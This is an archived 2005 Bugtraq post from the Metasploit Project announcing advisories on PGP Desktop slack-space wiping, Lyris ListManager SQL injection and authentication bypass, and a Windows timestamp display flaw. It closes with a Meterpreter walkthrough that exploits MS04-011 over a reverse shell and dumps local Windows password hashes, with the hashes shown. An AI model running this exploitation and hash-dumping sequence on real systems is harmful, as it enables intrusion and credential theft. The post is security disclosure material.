[41568] in bugtraq

home help back first fref pref prev next nref lref last post

PGP Wipe Free Space, Lyris ListManager Flaws, Windows Timestamps, Sam Juicer

daemon@ATHENA.MIT.EDU (H D Moore)
Fri Dec 9 17:25:03 2005

From: H D Moore <sflist@digitaloffense.net>
To: BUGTRAQ <bugtraq@securityfocus.com>
Date: Thu, 8 Dec 2005 22:44:55 -0600
MIME-Version: 1.0
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200512082244.55327.sflist@digitaloffense.net>

The Metasploit Project has released three new vulnerability sets and a 
password dumping extension to the Meterpreter payload. Enjoy!

-HD

[ PGP Desktop Wipe Free Space Flaw ]

PGP Desktop includes a Wipe Free Space utility that claims to eliminate 
data in all the free space on your hard drive including the the little 
areas after the end of existing files which may still have old data left 
behind. In short, the utility claims to wipe file slack space, the unused 
space in a disk cluster. The software does not work as advertised. It 
does not clean slack space.
- http://metasploit.com/research/vulns/pgp_slackspace/


[ Lyris ListManager Multiple Flaws ]

The Lyris ListManager software is vulnerable to numerous SQL injection, 
source code dislosure, and authentication bypass flaws. The ListManager 
software runs on Linux, Solaris, and Windows and can be configured to use 
one of the following database backends: PostgreSQL, Oracle, and 
MSSQL/MSDE. These flaws can be used to gain complete access to the 
ListManager data and often the host server itself.
- http://metasploit.com/research/vulns/lyris_listmanager/


[ Windows File Time Stamp Display Flaw ]

Windows file time stamps can be set to extremely low values via the 
NtSetInformationFile() system call. The Windows API does not properly 
translate the low 64-bit time values stored on disk into human readable 
format, and displays no information instead. Although this is not a 
security vulnerability in itself, it adversely affects third-party 
applications that rely upon the Windows API to perform the translation.
- http://metasploit.com/research/vulns/windows_timestamp/

[ Sam Juicer ]

A new extension has been added to the Meterpreter uber-payload in the 
Metasploit Framework. This extension allows you to dump the local Windows 
password hashes from a Meterpreter shell. The password dump is 
accomplished without writing any files to disk, as opposed to any version 
of pwdump available today. The Sam Juicer extension can be obtained via 
'msfupdate' or by downloading the latest snapshot of v2.5 of the 
Metasploit Framework. After successfully exploiting a system with one of 
the 'meterpreter' payloads, run the following commands to load the 
extension and dump the password hashes:

msf lsass_ms04_011(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.252:1124
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter>

<< load the Sam extension with the 'use' command >>

meterpreter> use -m Sam
loadlib: Loading library from 'ext551353.dll' on the remote machine.
loadlib: success.

<< use the gethashes command to dump the local password hashes >>

meterpreter> gethashes
Administrator:500:ec6r3a5c0k6mce249053939542f2c6c4:cp6wan5tahdibs94e89e2ffb49f307fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ snip ]

home help back first fref pref prev next nref lref last post